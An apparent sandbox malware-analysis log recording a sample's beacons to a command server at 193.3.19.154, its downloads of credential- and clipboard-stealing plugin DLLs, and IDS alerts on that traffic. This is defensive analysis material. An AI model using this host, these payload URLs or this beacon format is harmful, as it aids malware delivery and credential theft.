                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: Joe Sandbox ViewIP Address: 193.3.19.154 193.3.19.154
                  Source: Joe Sandbox ViewASN Name: ARNES-NETAcademicandResearchNetworkofSloveniaSI ARNES-NETAcademicandResearchNetworkofSloveniaSI
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49708 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49735 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49704 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49754 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49776 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 193.3.19.154:80
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/cred64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/cred64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/cred64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/clip64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/clip64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/clip64.dll HTTP/1.1Host: 193.3.19.154
                  Source: unknownHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/Plugins/clip64.dll
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/Plugins/clip64.dllYS2
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/Plugins/cred64.dll
